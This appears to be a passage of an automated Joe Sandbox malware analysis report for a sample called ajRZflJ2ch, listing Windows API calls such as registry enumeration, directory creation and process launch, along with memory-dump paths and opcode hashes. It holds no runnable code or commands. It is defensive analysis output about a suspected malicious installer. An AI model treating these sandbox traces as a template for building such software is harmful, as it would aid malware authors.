                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75573420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98